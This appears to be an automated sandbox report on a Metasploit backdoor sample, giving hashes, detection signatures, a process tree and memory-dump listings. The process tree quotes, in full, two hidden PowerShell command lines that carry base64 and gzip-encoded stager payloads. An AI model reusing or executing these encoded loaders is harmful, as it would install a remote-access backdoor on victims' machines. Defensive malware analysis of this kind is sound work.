metasploit | 7edf5852e1c1d236e60bb14aea151f44413c0a3cc7da903345ca39dc0222066c

General

Target

childdcscript.txt
Size

5KB
MD5

9dcd8c31fcc65e9e14bd72531472c733
SHA1

970d196acc1a24171a6d1942dd1da284feae199c
SHA256

7edf5852e1c1d236e60bb14aea151f44413c0a3cc7da903345ca39dc0222066c
SHA512

46317ddc7dfe9e71ca31fc6125119cfe212e48925469e8a18e09fe10188a85b5baa5b3f692e6a2ce32319e69f010021ab91cf24ab78b1e6cce7b7d417146ada1
SSDEEP

96:nnn2hhFPxohwFWujnZ+vFB9j+FbRGlts7QWRPtcN6yJ6HZYF+1f1mpoMu4lnWIN/:nn2hhFPxohwFWujQv5yqqQWRFcPJhFG2

Score

10^/10

metasploit backdoor trojan

Malware Config

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

2012 NOTEPAD.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2492 powershell.exe
2516 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2492 powershell.exe
Token: SeDebugPrivilege 2516 powershell.exe

pid	process
2012	NOTEPAD.EXE

pid	process
2492	powershell.exe
2516	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2492	powershell.exe
Token: SeDebugPrivilege	2516	powershell.exe

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 2708 wrote to memory of 2492	2708	cmd.exe	powershell.exe
PID 2708 wrote to memory of 2492	2708	cmd.exe	powershell.exe
PID 2708 wrote to memory of 2492	2708	cmd.exe	powershell.exe
PID 2492 wrote to memory of 2516	2492	powershell.exe	powershell.exe
PID 2492 wrote to memory of 2516	2492	powershell.exe	powershell.exe
PID 2492 wrote to memory of 2516	2492	powershell.exe	powershell.exe
PID 2492 wrote to memory of 2516	2492	powershell.exe	powershell.exe

C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\childdcscript.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:2012

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2708

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -w hidden -noni -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AbgBpACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEATQBvAE0AdQBWAHcAQwBBADcAVgBXAGEAVwAvAGIATwBCAEQAOQBuAEEARAA1AEQAMABKAGgAUQBCAEsAcQArAEUAagBjAGQAaABzAGcAdwBGAEkAKwA1AFYAaQBKAEgAYwBWAFgAdgBNAGEAQwBrAFMAaQBaAE4AaQBVADYARgBCAFUAZgAzAGYANwAzAEgAZABsAFMAawBxAEwAcABiAHIAdgBBAEMAagBaAE0AawBYAE8AKwBlAFoAeQB4AG4AMABTAHUAcABEAHgAUwBmAE0AZABUAHYAcAB3AGMASAAvAFcAdwB3AEsARwBpAEYAYgBiAFUAcwB3AHkAbABJAEYAaAB5AHAAeAA4AGQAdwBVAEYAaABZAFkANgBYAFoAZQBWAFMAMABhAFoAbwB0AGEAcgB6AEUATgBOAG8AZABuAEYAUgBTADQAUQBnAGsAVAB5ADgARgAxAHQARQBvAGoAZwBtADQAUQBPAGoASgBOAFoAMAA1AFMAOQBsAE4AQwBlAEMAbgBOADQAOABMAEkAZwByAGwAUwA5AEsANABjADkAaQBpAC8ARQBIAHoARABLAHgAYgBRADIANwBjADYASwBjAG8AcwBoAEwAegA3AHIAYwB4AFcAawA0AFIAVwBmAEYAcQBOAFQAVQBQAC8ANQBRADkAZQBsAHAAWgBWAFoAcwBQAEMAYQBZAHgAWgByAHEAYgBHAE4ASgB3AHEATABIAG0ASwBvAHIAWAAvAFgAVQA0AGQAMQAyAFIAVABUAFYAcABxADcAZwBNAGYAZABsAGMAVQBTAGoAOAA3AFAAaQBJAEkAcQB4AFQANgA3AEIAMgBoAE8AeABpAFoAeAB6AEwAMQBaADEAUwBBAE0AKwBnAHMAaABFAFIATQBvAGgAbwBkAFQAQwA0AFYAeABUAFkAZABrAFQAMwBFAFcAZQBKADAAZwBjAHEANABZAHkAVABXADEAUABaADcAUABmAHQAVwBuAG0AKwBEAGEASgBKAEEAMQBKADAAWQBvAGsARQBYAHoAbABFAFAARgBFAFgAUgBJAFgAMgB6AGoAeQBHAEwAawBsAC8AZwB5ADAASABDAGwAbwBGAE0AeAAwAEgAYwBTAGUAKwBKAEoAbwBoAFMAaABoAHoARgBCACsAeABZAHgAMgBUAGQAWQA1AGIARAArAHIAcABMADEAVwBBAHEAbQBlAEYATABvAEIAdABYAHcAcgBVAFoAdAA3AEMAUwBNAEgAVgBmAFcATgBTAFAAYwBFADAATwBIAEoAUwBRAEQAZwBmAFQAMAA1AFAAagBuADIAYwA4AGEARQA5AEcAegA3AG0AagBLAHcATwBwAHIAdQAxAHcAVABpADAAMwBvADgAcABuAHUANQBTADYAVgBzAEsARABZADQAdwBwAEsATABMAGIAdwBXADcAawBSAEMAOQBOAGsAegB1AHUAQQBBAEcAVAAvAFcAcgB1AFMAaQBJAEoAaABVAEoATwB4AE0AaAA1AHgANgBNADkARABJAEMAbABwAHcAbgAzADYATABQADYAYwBIAFAAMgBaAG0AbgBmAGcAMABJAHYAVgB0AGgARQBQAHEANQB1AFQAVAAzAGsASwBaACsASQB6AHMATQB5AHoAbQBZAHQAYwBRAGwASwBaAG0AQgA4AFMAcgBFADAAWQBDAEwARgBQAFkAMABtAEoALwBwADkAWQBJAHEAWAB6AFcATgBSAFAASwBQAEMASwBRAEMANQBXAEsASQBTAG8AbwBvAHYANQB0AE0ASQBkAEsAYQBLAG8AVgAyAFMAUQBFAGgAQQA3AHYAdwBMADYAQwBEADUAUQBuAHUAWABSAEcAOAAyADMAdQBQAFgAMABIAEkAYgBYAEcAYwBCAHcAYgBTAGkAKwBCAE8AKwBjAGEAaQBrAE0AdwBJADUANgBoAG8AQwBpAG0AMgBSAEYASwBKAE4AOAB2ADEAWgBkAHcANwBZAFIASgA2AHUASgBZADUAdQBaAG0AKwBqAE8AUQBtAGMATQBhAGoAMgBJAHAARQBoAGUAcQBCAHMAbgBmAE8AUwB2AGkAVQBzAHgAUwBMAEEAeQBsAFQAVAAxAGkAYgBoADAAYQA1AEkANwBWAE4ANQBHAG8AWQBjAGIAZwBKAG8AQwBsAEoANgBnAEUANwBLAFEASQBPAEQATABsAGcAdgBCAFMAWQBpAEcAOQA2AEIAQgBwAGgAUwB0AEcAUQBwAEQAWQAzAC8AMABtAHcAdwBIAGMAOQBJAHoAdABlACsAcgBnAGcASABqAHEAZAB3AEgAbQBiAEQANQBRAE4AOABVAGkAQgArAEYAVgBlAEYAQgBnAGgAMwBGAHAASwBFAE0AcQBKAFAAUwBRAEYARgBkAGcAMABYADkAeAAvAHEAcAAxAEgATQBLAG8AQwBaAEkAVgBRAHMAdAB2AHgAOQBUAGMAeQBwAFQAVABoAGYAbQBtADIAcgB0AE8ASwBaAG0AaABzAHMAZABBAFMATQBpAC8ASwBYAGgAbwA0AHAAaAA4AHIAQgA3ADYAaABQAGEAdQBkAEUATgByAEMASgA2AEoARgBUAEgAYgBOAFoAZQAwAGcAdABhADAAWQB0AG4AdwBIAGQAQgB6AGkAOQBjAC8AZQBWAGUAZABSAGIAcwBrADYAcAB1ADUAagA2AHoAWQBzAHQAdQA5AGUAcgAvAGQAcgBqADUAMQBuAEcARgBWAE8AZwAxAEwAWAB2AFUAcwBhAFQAZgBHAGkANABXAEQAMgByAGUARABpAGIAeQAzAFUAUAB1AE8AbABwAGUAVAA2AG0ANwBWAG8AVAB1AG4AaQA3AHoASgBwAHYAUgB4AFoAKwA3AFcAWgBYAE8AegBXAHcAUwBlAFAANgBuADcAZgB2AEQASgBkADIANAByAEgANQBxADAATwA2AHIAMQB6AGYASQBaADcAdABZAGIAUwBYAGQAawByAHMAMQB5AE4AVwA3AFEAZABiAHQAUABCAC8AMQBsAHAAeQBrAGYASgBrAE8ARwBCADMANABwAEcARgBjACsAWQA3AHIAcABpAHMAVwB3AHcAdQAyAGQAaABWAEIAcgBmAHUANwB1AE8AdgA2AHcATgBiAGUAOQA3AGEAUgBOAHkAYQBKAFUANwB0AEkAKwA2AGkATgAwADUAZAA0AE8AQgBxADEAZwBGAGIAUgBpAFYAUABvADgAZgBFAFMAagA0AE8AbwBlAFMAWQBhAFIAaABTAHcAeAA2AG4AeABnAFoAbgAvAFEATgBOAEcAZwBZAGYAYgB4AEQAZQArAGQAdgA2ACsAWABLAHYAZgBlAFkANgBOADUAUAA4AGEAZABrAEgAbQB0AGQAcQBrAHkARwBTAE0AUAA3AFUAcAAzAHcAYgB6AHkAcQBiAFYAWQBTADkAdwBaADcAVwAyADEAZQBHAFAASQBQAEkANQBrAFoASQAxAEwAcABTAEgAZAAzAFQALwAyAFcAdwBGAHEAQQBJADcARABrAEMAUABjAHAATQB2AEIAKwB6AEgAWQB1ADcANwBEAGcAVABrAGEAVgBGADUAawBrAFcAdQB2AE4AdABFADQAVwBhADgAdgBMADkAKwBsAGwAWQBYAFMARgBxAEoAbQByAC8AZgB4AFYAYwBGACsAMQBHADEAdABMAE8ASQA1AFoAbABCAEkANgBLAEwANQA3AFcAbAB5ADAAYwB6ADYAWQBvAC8AVABWAEUAUABUADAAbwBtADYASgBDAEkAaQBEAE0AWQBSAEQASwB5AGMAZwBZAGcAeAA3AHEAWgA5AGUAZAA5AEEAWQBTAFkAYwBPAG4AVQA2AE8AQQBhAHcAUABEADkANwBjADYAVQByAHoANABMADYAUwA3AHYATwB0AHkANAB1ADcAaQBGAEkASQBQAFcAZQBkAHMAVQB1AGkAUQBJADUATgA4AHEAYgA4ADMASQBaAG0AbQA5ADUAVQB5ADEARABtAGoAKwBmAFcAWQAyAHYAdAB0AHIAQgBsAHAARgAyADcAdwBNADQAegArAGIAWgAzAHIAeQBlADgAcgAzAGcAeABlAFgALwBGAGIAVABzAGoAcwAzAGgAeAAvAHMAMwAwAEYANwAyAC8AdQBIADAAcAA0AEEAcwBHADEAbgBLADMAKwAxAC8AdQAvAEYATABxAFAANQBxADYAaQBOAE0ASgBRAGcANgAwAEMATQBZAE8AUQB5AHAAdAB4AEgASQBHAFAASgBxAGkAawBOAFYAbwBQAHAAKwA5AHEAVAAvAHcAMgA0AFMAZQBYAG8ATgBzAC8AMwBrACsARwArAHYAOABWADMASgA4AHcAawBBAEEAQQA9AD0AJwAnACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2492

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAMoMuVwCA7VWaW/bOBD9nAD5D0JhQBKq+EjcdhsgwFI+5ViJHcVXvMaCkSiZNiU6FBUf3f73HdlSkqLpbrvACjZMkXO+eZyxn0SupDxSfMdTvpwcH/WwwKGiFbbUswylIFhypx8dwUFhYY6XZeVS0aZotarzENNodnFRS4QgkTy8F1tEojgm4QOjJNZ05S9lNCeCnN48LIgrlS9K4c9ii/EHzDKxbQ27c6KcoshLz7rcxWk4RWfFqNTUP/5Q9elpZVZsPCaYxZrqbGNJwqLHmKorX/XU4d12RTTVpq7gMfdlcUSj87PiIIqxT67B2hOxiZxzL1Z1SAM+gshERMohodTC4VxTYdkT3EWeJ0gcq4YyTW1PZ7PftWnm+DaJJA1J0YokEXzlEPFEXRIX2zjyGLkl/gy0HCloFMx0HcSe+JJohShhzFB+xYx2TdY5bD+rpL1WAqmeFLoBtXwrUZt7CSMHVfWNSPcE0OHJSQDgfT05Pjn2c8aE9Gz7mjKwOpru1wTi03o8pnu5S6VsKDY4wpKLLbwW7kRC9NkzuuAAGT/WruSiIJhUJOxMh5x6M9DIClpwn36LP6cHP2Zmnfg0IvVthEPq5uTT3kKZ+IzsMyzmYtcQlKZmB8SrE0YCLFPY0mJ/p9YIqXzWNRPKPCKQC5WKISooov5tMIdKaKoV2SQEhA7vwL6CD5QnuXRG823uPX0HIbXGcBwbSi+BO+caikMwI56hoCim2RFKJN8v1Zdw7YRJ6uJY5uZm+jOQmcMaj2IpEheqBsnfOSviUsxSLAylTT1ibh0a5I7VN5GoYcbgJoClJ6gE7KQIODLlgvBSYiG96BBphStGQpDY3/0mwwHc9Izte+rggHjqdwHmbD5QN8UiB+FVeFBgh3FpKEMqJPSQFFdg0X9x/qp1HMKoCZIVQstvx9TcypTThfmm2rtOKZmhssdASMi/KXho4ph8rB76hPaudENrCJ6JFTHbNZe0gta0YtnwHdBzi9c/eVedRbsk6pu5j6zYstu9er/drj51nGFVOg1LXvUsaTfGi4WD2reDiby3UPuOlpeT6m7VoTuni7zJpvRxZ+7WZXOzWwSeP6n7fvDJd24rH5q0O6r1zfIZ7tYbSXdkrs1yNW7QdbtPB/1lpykfJkOGB34pGFc+Y7rpisWwwu2dhVBrfu7uOv6wNbe97aRNyaJU7tI+6iN05d4OBq1gFbRiVPo8fESj4OoeSYaRhSwx6nxgZn/QNNGgYfbxDe+dv6+XKvfeY6N5P8adkHmtdqkyGSMP7Up3wbzyqbVYS9wZ7W21eGPIPI5kZI1LpSHd3T/2WwFqAI7DkCPcpMvB+zHYu77DgTkaVF5kkWuvNtE4Wa8vL9+llYXSFqJmr/fxVcF+1G1tLOI5ZlBI6KL57Wly0cz6Yo/TVEPT0om6JCIiDMYRDKycgYgx7qZ9ed9AYSYcOnU6OAawPD97c6Urz4L6S7vOty4u7iFIIPWedsUuiQI5N8qb83IZmm95Uy1Dmj+fWY2vttrBlpF27wM4z+bZ3rye8r3gxeX/FbTsjs3hx/s30F72/uH0p4AsG1nK3+1/u/FLqP5q6iNMJQg60CMYOQyptxHIGPJqikNVoPp+9qT/w24SeXoNs/3k+G+v8V3J8wkAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2516

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1XIVNEYFC5DCQPBMVG4T.temp
Filesize
7KB

MD5
e0f94d1a54f7271f93048258b6b61720

SHA1
e6c22e4c60548850409f3f6f0af954dcf975fba2

SHA256
86bea73c6c9a91cefc3d570aaf85fb644fe91bb1ce724be24a76bdf1dd977cf0

SHA512
b0bcd080268386fa707ef19d84ddd28c3e965b821b5da6bd5f0310978942842e04ad31ab918c5acc6b253342b3795df95dd554c31a4ad8be6d82e561eb87f155

Download Submit
memory/2492-4-0x000007FEF4C1E000-0x000007FEF4C1F000-memory.dmp

Filesize
4KB

Download
memory/2492-5-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download
memory/2492-6-0x0000000001F70000-0x0000000001F78000-memory.dmp

Filesize
32KB

Download
memory/2492-7-0x000007FEF4960000-0x000007FEF52FD000-memory.dmp

Filesize
9.6MB

Download
memory/2492-8-0x000007FEF4960000-0x000007FEF52FD000-memory.dmp

Filesize
9.6MB

Download
memory/2492-9-0x000007FEF4960000-0x000007FEF52FD000-memory.dmp

Filesize
9.6MB

Download
memory/2492-10-0x000007FEF4960000-0x000007FEF52FD000-memory.dmp

Filesize
9.6MB

Download
memory/2492-11-0x000007FEF4960000-0x000007FEF52FD000-memory.dmp

Filesize
9.6MB

Download
memory/2492-12-0x000007FEF4960000-0x000007FEF52FD000-memory.dmp

Filesize
9.6MB

Download
memory/2516-15-0x0000000002710000-0x0000000002711000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads